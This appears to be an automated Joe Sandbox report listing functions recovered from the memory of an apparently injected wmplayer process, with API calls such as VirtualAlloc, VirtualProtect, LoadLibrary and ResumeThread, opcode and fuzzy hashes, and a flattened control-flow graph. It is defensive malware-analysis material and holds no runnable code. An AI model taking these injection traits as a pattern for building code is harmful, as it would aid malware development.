                                                                                                                • String ID:
                                                                                                                • API String ID: 2453823186-0
                                                                                                                • Opcode ID: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                • Instruction ID: ee7323b6aa135ee739abc512efff09d14f47d9ec32f21299d7e3c642e43dc0d4
                                                                                                                • Opcode Fuzzy Hash: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                • Instruction Fuzzy Hash: CBB1313161CA484BEB55EF64D8845AF73F1FB95300F604A3AE08BC35A3DE78EA058781
                                                                                                                Function 00007DF424A14290 Relevance: 3.2, APIs: 2, Instructions: 244windowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2629687156.00007DF424A11000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A11000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a11000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2453823186-0
                                                                                                                • Opcode ID: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                • Instruction ID: 1977c82b9a4614a292def32169096af6a93948d45f4e1d31ab9c148c59650153
                                                                                                                • Opcode Fuzzy Hash: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                • Instruction Fuzzy Hash: C071423161CA488FDB55EF18E8816AB73F1FB55700B60467AE44FC71A6DA38EA018BC1
                                                                                                                Function 00000207587922D4 Relevance: 3.2, APIs: 2, Instructions: 222memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 508 207587922d4-20758792303 GetSystemInfo 509 20758792313-20758792329 508->509 510 20758792305-20758792310 508->510 511 2075879232f-20758792332 509->511 510->509 512 20758792334-20758792337 511->512 513 2075879234e-20758792354 511->513 516 20758792349-2075879234c 512->516 517 20758792339-2075879233c 512->517 514 207587923cf-207587923d2 513->514 515 20758792356-20758792366 513->515 519 2075879245e 514->519 518 20758792395-2075879239b 515->518 516->511 517->516 520 2075879233e-20758792343 517->520 521 20758792368-2075879237f 518->521 522 2075879239d 518->522 523 20758792460-20758792463 519->523 524 2075879246b-20758792482 519->524 520->516 525 207587924b1-207587924c3 520->525 521->522 536 20758792381-20758792389 521->536 526 2075879239f-207587923a2 522->526 527 207587923d7-207587923f5 523->527 528 20758792469 523->528 529 20758792484-2075879249e 524->529 526->514 531 207587923a4-207587923c4 VirtualAlloc 526->531 533 20758792437 527->533 534 207587923f7-2075879240e 527->534 528->525 529->529 532 207587924a0-207587924ab 529->532 531->524 537 207587923ca-207587923cd 531->537 532->525 535 20758792439-2075879243c 533->535 534->533 541 20758792410-20758792418 534->541 535->525 539 2075879243e-2075879245c 535->539 536->526 540 2075879238b-20758792393 536->540 537->514 537->515 539->519 540->518 540->522 541->535 542 2075879241a-20758792435 541->542 542->533 542->534
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocInfoSystemVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3440192736-0
                                                                                                                • Opcode ID: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                • Instruction ID: 2d1effce80618c05341ab11d49033a2c6baf344e30d5b5ed454d6548cc74d20c
                                                                                                                • Opcode Fuzzy Hash: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                • Instruction Fuzzy Hash: DC51B53062CF0D4FFB95FABC984C3A976D1F79C300FA40929D85DD3596EA64E8858781
                                                                                                                Function 000002075879D7C0 Relevance: 3.2, APIs: 2, Instructions: 155fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseFileHandleViewmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4055022194-0
                                                                                                                • Opcode ID: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                • Instruction ID: a36ec67e564826bd832b2d864c8ac2ae4e9f95452d89dce5483526011f4e8618
                                                                                                                • Opcode Fuzzy Hash: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                • Instruction Fuzzy Hash: BA418531618A084FE785FFB8DC89BB67BD4EBA9304F500919A80AD2593DF34E9418B81
                                                                                                                Function 0000020758792978 Relevance: 3.1, APIs: 2, Instructions: 97memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                • Instruction ID: b4756eba245f0f2bbec868eea5dfb98b09c7b4d7551a9710015208e5081493ca
                                                                                                                • Opcode Fuzzy Hash: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                • Instruction Fuzzy Hash: 7731362161CB844BEB50AB7CDC987953FD1FB5A320F650295ECAED72DACB58D802C385
                                                                                                                Function 00007DF424A012C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000003.2400461839.00007DF424A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A01000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_3_7df424a01000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                • Instruction ID: 048d161bbc06ac3da32ac6219794b6f2a0d37d0f27d06773d6b8915a370b6d52
                                                                                                                • Opcode Fuzzy Hash: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                • Instruction Fuzzy Hash: 8321293560864547D75D8B2CCC847F7B3F1FF95300F24513AE48BC79A6D66AFA018246
                                                                                                                Function 00007DF424A11740 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2629687156.00007DF424A11000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A11000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a11000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                • Instruction ID: 8533535cef5ca4608a505255031c8bc7a4d14b0799a69b2e04e0ee3da7629fdb
                                                                                                                • Opcode Fuzzy Hash: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                • Instruction Fuzzy Hash: 6D21057160854547EB199B2CAC84A77B3F1FF99300F24013AE44FC73A6D668EA01CA85
                                                                                                                Function 00007DF424A41740 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2629866886.00007DF424A41000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A41000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a41000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                • Instruction ID: 9a402bf9cf7c42a440c5aa6b11834f79db3868302e9a3cb2d728baeecd130c19
                                                                                                                • Opcode Fuzzy Hash: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                • Instruction Fuzzy Hash: 9D21E5B560864547DB199B2CDC88A7BB3F1FF95300F24023AE44FD79A6D668FA018A85
                                                                                                                Function 00007DF424A612C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2630049510.00007DF424A61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A61000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a61000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                • Instruction ID: b11925602d9af91999d23d5ea13a2373d60fbb345d784d7e969211d5891b8a8d
                                                                                                                • Opcode Fuzzy Hash: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                • Instruction Fuzzy Hash: D221F935A0854547DFD99B2CDC445B6BBF1FF95300F24013AE48BC79A6D668EA018255
                                                                                                                Function 000002075879C994 Relevance: 2.8, APIs: 2, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: callocfreemalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4086611775-0
                                                                                                                • Opcode ID: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                • Instruction ID: 37f69f9b97eb28e67e6d72936956f49e5ab4e3ba5e2ef7dccb1a33349530b5d9
                                                                                                                • Opcode Fuzzy Hash: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                • Instruction Fuzzy Hash: D191663151CB484BDBA5EF64C8897EAB7E1FBD8300F900D2EE48AD3553DE35A5458782
                                                                                                                Function 000002075879CC9C Relevance: 1.7, APIs: 1, Instructions: 228fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                • Instruction ID: a7b4755244ab1f535e2c5dc10854504472b9cfc065fedc317630c4f5af856b9f
                                                                                                                • Opcode Fuzzy Hash: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                • Instruction Fuzzy Hash: 3C71F83160CB044FEBA9DB6CDC856A577E5F798310F600A1DD88BD3992DB30F8068785
                                                                                                                Function 00007DF424A015E8 Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000003.2400461839.00007DF424A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A01000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_3_7df424a01000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileMappingOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1680863896-0
                                                                                                                • Opcode ID: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                • Instruction ID: 50a95625512ad23f53a6b909620d26b4d3216dd6657d60ca3fba461d65e9487d
                                                                                                                • Opcode Fuzzy Hash: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                • Instruction Fuzzy Hash: 1571737161C7884FD775DF2898857BBB7E1FB99300F105A3EE58FC2152EA34A9058B82
                                                                                                                Function 0000020758796C68 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                • Opcode ID: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                • Instruction ID: 725a273a51fa8e4d46b9fed877c3717eaf75caa55d4b7c2b786461cd405ab1df
                                                                                                                • Opcode Fuzzy Hash: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                • Instruction Fuzzy Hash: 5941C83061CB080BEF99F7789C997EA37D5E79C310F940B19AC16D39D7DE28E9058245
                                                                                                                Function 00000207587977DC Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationVolume
                                                                                                                • String ID:
                                                                                                                • API String ID: 2039140958-0
                                                                                                                • Opcode ID: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                • Instruction ID: 2c94d9e59708f2c4ee838de5d25ecbf63a31a1bf9f0270cffef2b18550153052
                                                                                                                • Opcode Fuzzy Hash: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                • Instruction Fuzzy Hash: 4B41507151C7488BE7AAEF64C8987DBB7E0FB98300F504E1DA48AD3592EF75A504CB42
                                                                                                                Function 00007DF424A434A8 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2629866886.00007DF424A41000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A41000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a41000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EventHook
                                                                                                                • String ID:
                                                                                                                • API String ID: 3661607649-0
                                                                                                                • Opcode ID: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                • Instruction ID: 998073e38ec4c1c50c87fcaa85137b8b30b1caae5ba8325b56b5af136105bba2
                                                                                                                • Opcode Fuzzy Hash: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                • Instruction Fuzzy Hash: AF319531618A458FEB54FF25E88556A73B0FF6A310F20063ED04FC79A2DB78A941CB41
                                                                                                                Function 000002075879CEE0 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                • Instruction ID: d75a6ab6bc997e63fd343bafb05faaee9ff98b3e74d32146b1e6119faccae53c
                                                                                                                • Opcode Fuzzy Hash: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                • Instruction Fuzzy Hash: 9601C871704A0C8FDB81EF68D8855A9B7E9FBDC300F500A2AE84AC2151DF30EA158781
                                                                                                                Function 0000020758792908 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                • Instruction ID: c1b58e8a0045dbf5073c36860f7af2f40081f57e39cd463cfcd36ac7d135c5d4
                                                                                                                • Opcode Fuzzy Hash: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                • Instruction Fuzzy Hash: 64012631B18A198FEB94B77DDC88A6537D1FB8E321B944074EC1ED3155DA39AC41CB44
                                                                                                                Function 00007DF424A13CDC Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2629687156.00007DF424A11000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A11000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a11000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EventHook
                                                                                                                • String ID:
                                                                                                                • API String ID: 3661607649-0
                                                                                                                • Opcode ID: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                • Instruction ID: 2a03495858eb9396a3e08b5af5cbcc8d40aafd316b25762550c2a06f33e7555a
                                                                                                                • Opcode Fuzzy Hash: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                • Instruction Fuzzy Hash: 0411AD3081DA559AFB54AF24AC547AB72B0FF05314F600A7DD04FC20E3DBACB6058B41
                                                                                                                Function 000002075879BEF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                • Instruction ID: 9b9bc09d3408298d27a26dc3d315a2b46d6873ea6f6ef2665b40d4ff6b921a89
                                                                                                                • Opcode Fuzzy Hash: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                • Instruction Fuzzy Hash: E501A931A18B4C4FF785EB788C997BA3AD6F758301FA0497AA44AD32D2DA68D9048741
                                                                                                                Function 0000020758792B54 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 10892065-0
                                                                                                                • Opcode ID: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                • Instruction ID: ac09296efe42e6e651b0dd58369f465a1ff43a43b671968ffc06730d32493e6f
                                                                                                                • Opcode Fuzzy Hash: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                • Instruction Fuzzy Hash: E3F0E565F2CB094BF794FFF66C8C3A62691D38831AFF44D3BD819D7582E93A88854200
                                                                                                                Function 00000207587969B8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCallerProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2663294120-0
                                                                                                                • Opcode ID: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                • Instruction ID: 8ecf0d7444bf6cdbc384ae59a1dabff73e0080a324479e27dc35901c5300a2bd
                                                                                                                • Opcode Fuzzy Hash: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                • Instruction Fuzzy Hash: 27E0C211B08D190BABA861FE288C6B655C6C7EC172764027BE81DC3296EC50CC814390
                                                                                                                Function 0000020758793C88 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionTable
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252446317-0
                                                                                                                • Opcode ID: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                • Instruction ID: 7788f66b62ba35619d0310bbb953a8974d46480e599ff66b1cfa8636f09f070b
                                                                                                                • Opcode Fuzzy Hash: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                • Instruction Fuzzy Hash: 64E04F305009054BEFA8DB6DC84D3903AE0E79D306FA04268D805C92D1CB39D8ABCF82
                                                                                                                Function 00000207587974F0 Relevance: 1.5, APIs: 1, Instructions: 276COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                • Instruction ID: 5e8a4fde871837107d58e6cb71baa15aad2599a7f754758f5020b5ee19a1345d
                                                                                                                • Opcode Fuzzy Hash: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                • Instruction Fuzzy Hash: 8D91833061CB088FDB84EF68D889AEA77E0FB58340F944959E84AC7597DE30F851CB81
                                                                                                                Function 00007DF424A01290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000003.2400461839.00007DF424A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A01000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_3_7df424a01000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionTable
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252446317-0
                                                                                                                • Opcode ID: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                • Instruction ID: aed3c6f127040b76e00f57153bd1e0d0c6172b58691670f4e072217f24e47b5c
                                                                                                                • Opcode Fuzzy Hash: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                • Instruction Fuzzy Hash: A1E04F309049055BEB98D61DC8097903AE0FB5C30AF608679D505C92A1CB7A949BCF81
                                                                                                                Function 00007DF424A11708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2629687156.00007DF424A11000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A11000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a11000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionTable
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252446317-0
                                                                                                                • Opcode ID: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                • Instruction ID: b9ced022f99a1617d8c2297e7a10ffa3d30ddd50875b89a25778c8ef8531d727
                                                                                                                • Opcode Fuzzy Hash: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                • Instruction Fuzzy Hash: A9E04F705109094BEB98D61DC8497A036E0EB5C306F604269D409CA2A1CB39949BCF81
                                                                                                                Function 00007DF424A41708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2629866886.00007DF424A41000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A41000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a41000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionTable
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252446317-0
                                                                                                                • Opcode ID: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                • Instruction ID: 00f086170d8aaca6b9ac06da54e02d097df9456cdf6329d97c7d4a3ff6b5496d
                                                                                                                • Opcode Fuzzy Hash: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                • Instruction Fuzzy Hash: 8BE04F705009094BEBA8D71DC84D75036E0EB58306F604269D405DA291CB3D949BCF81
                                                                                                                Function 00007DF424A61290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2630049510.00007DF424A61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A61000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a61000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionTable
                                                                                                                • String ID:
